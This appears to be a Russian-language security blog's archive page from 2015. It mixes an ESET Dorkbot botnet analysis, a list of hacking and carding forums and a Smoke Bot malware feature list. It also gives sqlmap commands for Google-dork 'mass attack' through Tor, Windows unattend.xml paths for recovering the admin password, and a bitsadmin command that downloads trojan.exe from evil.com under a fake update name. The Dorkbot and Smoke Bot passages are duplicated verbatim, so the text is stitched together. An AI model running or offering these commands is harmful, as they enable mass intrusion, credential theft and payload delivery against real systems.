Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exefor known malicious executable) or IP address (e.g. 103.224.167.117 for known attacker). Also, it has (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).
07.12.2015
Ботнет Dorkbot [eset]
На диаграмме ниже показаны различные компоненты, которые используются в последних версиях Dorkbot, нам удалось их проанализировать.
Рассмотрим типичный процесс заражения вредоносной программой через съемный USB-накопитель, который поможет лучше проиллюстрировать роль каждого модуля. Так как Dorkbot выполняет поиск подключенных к зараженной системе съемных носителей для их последующей компрометации, многие из наших обнаружений образцов этой вредоносной программы срабатывали именно на съемных носителях. При этом на них было обнаружено два типа файлов Dorkbot: исполняемый файл дроппера и .LNK-файлы с фишинговыми названиями, которые указывают на файл дроппера.
При запуске пользователем дроппера Dorkbot с USB-носителя (обнаруживается AV-продуктами ESET как Win32/Dorkbot.I), он пытается загрузить с удаленного сервера основной компонент вредоносной программы. Адрес самого сервера жестко зашит в исполняемом файле дроппера. Загруженный файл сильно упакован, а его код извлекает из себя и исполняет исполняемый файл Win32/Dorkbot.L, который представляет из себя простую обертку (wrapper), используемую для установки основного компонента. Этот основной компонент обнаруживается нами как Win32/Dorkbot.B и отвечает за работу с удаленным сервером по IRC. Обертка также специализируется на перехвате API-функции DnsQuery у основного компонента. Такой метод используется Dorkbot для усложнения обнаружения доменов настоящих C&C-серверов антивирусными аналитиками, поскольку в таком случае у запускаемого компонента отсутствуют адреса настоящих C&C-серверов злоумышленников. Когда он попытается выполнить трансляцию доменов через DnsQuery, вызов функции будет перехвачен и в качестве одного из аргументов обертка передаст API-функции адрес настоящего C&C-сервера.
После завершения установки вредоносной программы, бот будет пытаться подключиться к IRC-серверу и будет ожидать поступления определенных команд по фиксированному каналу от злоумышленников. Как правило, бот получает команды на загрузку и исполнение в системе новых вредоносных программ, которые были указаны выше.
Ботнет на основе Dorkbot активен уже давно и злоумышленники успешно используют его по сей день. Инфраструктура управляющих C&C-серверов этого ботнета является одной из тех, деятельность которой отслеживают специалисты компании ESET. Такая информация очень важна для отслеживания изменений в поведении вредоносной программы, а также для накапливания информации о ней, с целью ее использования правоохранительными органами.
Вредоносная программа Dorkbot не использует каких-либо новых методов для компрометации новых систем. Пользователи должны быть осторожны при открытии файлов на сменных носителях, а также тех файлов, которые они получают через электронную почту и социальные сети. Для проверки своей системы на заражение Dorkbot, можно воспользоваться нашим бесплатным инструментом отсюда. На сегодняшний день антивирусные продукты ESET тысячи различных модификаций файлов Dorkbot, а также файлов вредоносных программ, которые распространяются этим ботнетом.
Ниже приведены примеры URL-адресов или их составляющих, на срабатывание которых нацелен компонент похитителя паролей Dorkbot.

Рассмотрим типичный процесс заражения вредоносной программой через съемный USB-накопитель, который поможет лучше проиллюстрировать роль каждого модуля. Так как Dorkbot выполняет поиск подключенных к зараженной системе съемных носителей для их последующей компрометации, многие из наших обнаружений образцов этой вредоносной программы срабатывали именно на съемных носителях. При этом на них было обнаружено два типа файлов Dorkbot: исполняемый файл дроппера и .LNK-файлы с фишинговыми названиями, которые указывают на файл дроппера.
При запуске пользователем дроппера Dorkbot с USB-носителя (обнаруживается AV-продуктами ESET как Win32/Dorkbot.I), он пытается загрузить с удаленного сервера основной компонент вредоносной программы. Адрес самого сервера жестко зашит в исполняемом файле дроппера. Загруженный файл сильно упакован, а его код извлекает из себя и исполняет исполняемый файл Win32/Dorkbot.L, который представляет из себя простую обертку (wrapper), используемую для установки основного компонента. Этот основной компонент обнаруживается нами как Win32/Dorkbot.B и отвечает за работу с удаленным сервером по IRC. Обертка также специализируется на перехвате API-функции DnsQuery у основного компонента. Такой метод используется Dorkbot для усложнения обнаружения доменов настоящих C&C-серверов антивирусными аналитиками, поскольку в таком случае у запускаемого компонента отсутствуют адреса настоящих C&C-серверов злоумышленников. Когда он попытается выполнить трансляцию доменов через DnsQuery, вызов функции будет перехвачен и в качестве одного из аргументов обертка передаст API-функции адрес настоящего C&C-сервера.
После завершения установки вредоносной программы, бот будет пытаться подключиться к IRC-серверу и будет ожидать поступления определенных команд по фиксированному каналу от злоумышленников. Как правило, бот получает команды на загрузку и исполнение в системе новых вредоносных программ, которые были указаны выше.
Ботнет на основе Dorkbot активен уже давно и злоумышленники успешно используют его по сей день. Инфраструктура управляющих C&C-серверов этого ботнета является одной из тех, деятельность которой отслеживают специалисты компании ESET. Такая информация очень важна для отслеживания изменений в поведении вредоносной программы, а также для накапливания информации о ней, с целью ее использования правоохранительными органами.
Вредоносная программа Dorkbot не использует каких-либо новых методов для компрометации новых систем. Пользователи должны быть осторожны при открытии файлов на сменных носителях, а также тех файлов, которые они получают через электронную почту и социальные сети. Для проверки своей системы на заражение Dorkbot, можно воспользоваться нашим бесплатным инструментом отсюда. На сегодняшний день антивирусные продукты ESET тысячи различных модификаций файлов Dorkbot, а также файлов вредоносных программ, которые распространяются этим ботнетом.
Ниже приведены примеры URL-адресов или их составляющих, на срабатывание которых нацелен компонент похитителя паролей Dorkbot.
06.12.2015
Security blog`s list [блоги по ИБ]
Список блогов, посвящённых информационной безопасности. Знаете (ведёте) тематический блог на русском (желательно) языке, отсутствующий здесь? Сообщите, и он обязательно будет включён в данный список.
Hack[ers] Forums list
| Адрес | Краткое описание | Тип регистрации |
|---|---|---|
| http://bhf.su/ | Best Hack Forum, программирование и хакерский софт | Открытая |
| http://brutezone.ru/ | BruteZone - форум об информационной безопасности | Открытая |
| http://bugtraq.ru/forum/ | Общетематический форум портала BugTraq, посвящённый ИБ | Открытая |
| http://carderland.com/ | Форум кардеров которые интересуются оборудованием для кардинга, обналом, пластиком и дампами. | Открытая |
| http://ccc.gs | Форум школьников, изначально сделанный для кидков и мошенничества, есть статьи по кардерству. |
11.11.2015
[ RAT / Bot ] list 2015
"Список актуальных ботнетов и РАТов, их характеристики и описания 2015 (list botnet/RAT)"
https://fuckav.ru/showthread.php?t=26208
Smoke Bot
Smoke Bot - это модульный бот (возможны две версии - резидентная и нерезидентная).
* нерезидентная версия - после загрузки, бот выполняет все задания и самоудаляется, т.е не устанавливается в систему
Преимущества:
- наличие модулей-плагинов, которые расширяют функционал бота, при этом не влияют на размер бота
- подробная статистика по версия системы, странам и онлайну
- подробная статистика по заданиям, загрузки / запуски, ограничение на количество и т.п.
- задания для бота на загрузку EXE или DLL (LoadLibrary, regsvr32, запуск из памяти без необходимости в криптовании)
- гео-таргетинг (выборочные загрузки только для конкретных стран или блокировка для определенных стран)
- загрузка задания с удаленного URL
- индивидуальное задание для каждого бота и поиск ботов по ID, стране или префиксу селлера
- незаметная установка в системе, защита собственных файлов и записей в реестре *
- самообновление бота через админку (локально или удаленно) *
- резервные URL для отстука *
- возможность использования префиксов для селлеров (более точная статистика и разделение заданий)
https://fuckav.ru/showthread.php?t=26208
Smoke Bot
Smoke Bot - это модульный бот (возможны две версии - резидентная и нерезидентная).
* нерезидентная версия - после загрузки, бот выполняет все задания и самоудаляется, т.е не устанавливается в систему
Преимущества:
- наличие модулей-плагинов, которые расширяют функционал бота, при этом не влияют на размер бота
- подробная статистика по версия системы, странам и онлайну
- подробная статистика по заданиям, загрузки / запуски, ограничение на количество и т.п.
- задания для бота на загрузку EXE или DLL (LoadLibrary, regsvr32, запуск из памяти без необходимости в криптовании)
- гео-таргетинг (выборочные загрузки только для конкретных стран или блокировка для определенных стран)
- загрузка задания с удаленного URL
- индивидуальное задание для каждого бота и поиск ботов по ID, стране или префиксу селлера
- незаметная установка в системе, защита собственных файлов и записей в реестре *
- самообновление бота через админку (локально или удаленно) *
- резервные URL для отстука *
- возможность использования префиксов для селлеров (более точная статистика и разделение заданий)
03.10.2015
sqlmap [google dork] mass attack
sqlmap -g "dork" --batch --beep --dbs --random-agent
sqlmap -u "site" --dbs --batch --beep --tor --check-tor --tor-type=SOCKS5
sqlmap --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
sqlmap -u "site" --dbs --batch --beep --tor --check-tor --tor-type=SOCKS5
01.10.2015
30.09.2015
[ OSSEC + Splunk ] config/install
On Splunk:
nano /opt/splunk/etc/system/default/inputs.conf
Example install Splunk:
rpm -Uvh splunk-5.0.2-149561-linux-2.6-x86_64.rpm
Install ossec module into splunk
[udp://192.168.10.109:10002] # OSSEC server IP
disabled = false
sourcetype = ossec
disabled = false
sourcetype = ossec
OR
21.09.2015
[ один из путей получения пароля админа windows ]
Metasploit есть специальный модуль для постэксплуатации: post/windows/gather/enum_unattend
C:\sysprep.inf
C:\sysprep\sysprep.xml
расположение файлов:
C:\Windows\Panther\unattend.xml или Autounattend.xml
C:\Windows\Panther\Unattend\unattend.xml или Autounattend.xmlC:\sysprep.inf
C:\sysprep\sysprep.xml
"У каждой крупной компании есть типовая задача: покупаются новые компью-
теры, и на них надо установить Windows и дополнительное ПО, настроить. Есть
несколько официальных подходов к автоматизации этого процесса, но их под-
робности для нас не особенно важны. Интересно лишь то, что при установке
ОС необходимо указывать различные параметры и они задаются с помощью
специального файла. Причем если задается пароль для пользователя (локаль-
ного админа), то содержится он в этом файле в плейнтексте (максимум —
в Base64). Иногда этот файл может быть оставлен в файловой системе Windows.
Таким образом, обладая лишь пользовательским доступом в ОС, мы можем
поискать этот специальный файл и узнать, нет ли в нем пароля. Воистину easy hack!"
ЗАКАЧАТЬ ФАЙЛ В WINDOWS С ПОМОЩЬЮ BITS
bitsadmin /transfer myjob /download http://evil.com/trojan.exe c:\Windows\Temp\kb123456.exe
"Представим себе типичную ситуацию: через какую-то уязвимость мы по-
лучили возможность удаленно выполнять команды на сервере с Windows.
Высоких привилегий в ОС у нас нет, и порты зафильтрованы на внешнем
файрволе. Подошел бы вариант с бэк-коннект шеллом, но ведь надо зака-
чать наш шелл в ОС. И если под *nix-системы существует куча разных воз-
можностей, то с виндой труднее. Можно, конечно, использовать FTP-кли-
ент или скрипт WSH, но эти варианты требуют многострочных действий,
что часто бывает проблемой из-за ограничений уязвимости, которая дает
RCE.
Оказывается, Windows еще со времен XP хранит в себе интересную
тулзу — bitsadmin."
Подписаться на:
Сообщения (Atom)